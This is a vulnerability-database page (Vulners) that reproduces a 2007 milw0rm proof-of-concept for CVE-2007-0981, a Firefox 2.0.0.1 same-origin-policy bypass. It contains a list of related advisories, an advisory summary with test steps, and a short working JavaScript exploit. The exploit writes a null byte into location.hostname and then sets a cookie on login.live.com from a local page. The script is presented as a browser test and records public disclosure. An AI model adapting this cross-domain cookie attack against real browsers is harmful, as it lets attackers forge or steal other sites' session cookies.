Vulners
Lucene search
Mozilla Firefox 2.0.0.1 - 'location.hostname' Cross-Domain
| Reporter | Title | Published | Views | Family All 110 |
|---|---|---|---|---|
 | mozilla -- multiple vulnerabilities | 23 Feb 200700:00 | – | freebsd |
 | Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerabil | 20 Feb 200700:00 | – | zdt |
 | Mozilla Firefox < 1.5.0.10 / 2.0.0.2 Multiple Vulnerabilities | 26 Feb 200700:00 | – | nessus |
| SeaMonkey < 1.0.8 Multiple Vulnerabilities | 28 Feb 200700:00 | – | nessus |
| Mozilla Thunderbird < 1.5.0.10 Multiple Vulnerabilities (deprecated) | 2 Mar 200700:00 | – | nessus |
| LedgerSMB / SQL-Ledger Authentication Bypass | 12 Mar 200700:00 | – | nessus |
| CentOS 3 / 4 : seamonkey (CESA-2007:0077) | 26 Feb 200700:00 | – | nessus |
| CentOS 4 : thunderbird (CESA-2007:0078) | 6 Mar 200700:00 | – | nessus |
| CentOS 4 : firefox (CESA-2007:0079) | 26 Feb 200700:00 | – | nessus |
| Debian DSA-1336-1 : mozilla-firefox - several vulnerabilities | 27 Jul 200700:00 | – | nessus |
10
<!--
________________________________________________________________________________
Mozilla Firefox 'location.hostname' Cross-Domain Vulnerability
________________________________________________________________________________
Software : Mozilla Firefox version 2.0.0.1 and prior
CVE reference : CVE-2007-0981
Impact : Security Bypass
Risk : Moderate
Discovered by : Michal Zalewski (http://lcamtuf.coredump.cx/)
Advisory Date : 2007-02-15
Mozilla Firefox allows remote attackers to bypass the same origin policy, steal
cookies, and conduct other attacks by writing a URI with a null byte to the
hostname (location.hostname) DOM property, due to interactions with DNS
resolver code.
Links
http://lcamtuf.dione.cc/ffhostname.html (test)
https://bugzilla.mozilla.org/show_bug.cgi?id=370445
________________________________________________________________________________
How To Test Your Browser ?
1 - Execute this on your local web server (or change variable 'mydomain')
2 - Go to the link 'http://login.live.com/' and read the login
(or check Tools -> Options -> Privacy -> Show Cookies for login.live.com)
________________________________________________________________________________
Gorn, gorn.support[gmail]com
2007-02-19 16:00
-->
<script language="javascript">
var mydomain = '127.0.0.1';
var var_cook = 'MSPPre=firefox_vulnerability_test';
var dom_cook = 'login.live.com';
if (location.hostname == mydomain)
{
try { location.hostname = mydomain + '\x00www.' + dom_cook; }
catch (err) { alert('Failed to modify location.hostname'); }
} else {
document.cookie = var_cook + '; domain=.' + dom_cook + '; path=/;';
}
</script>
# milw0rm.com [2007-02-20]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Feb 2007 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 27.5
EPSS0.16432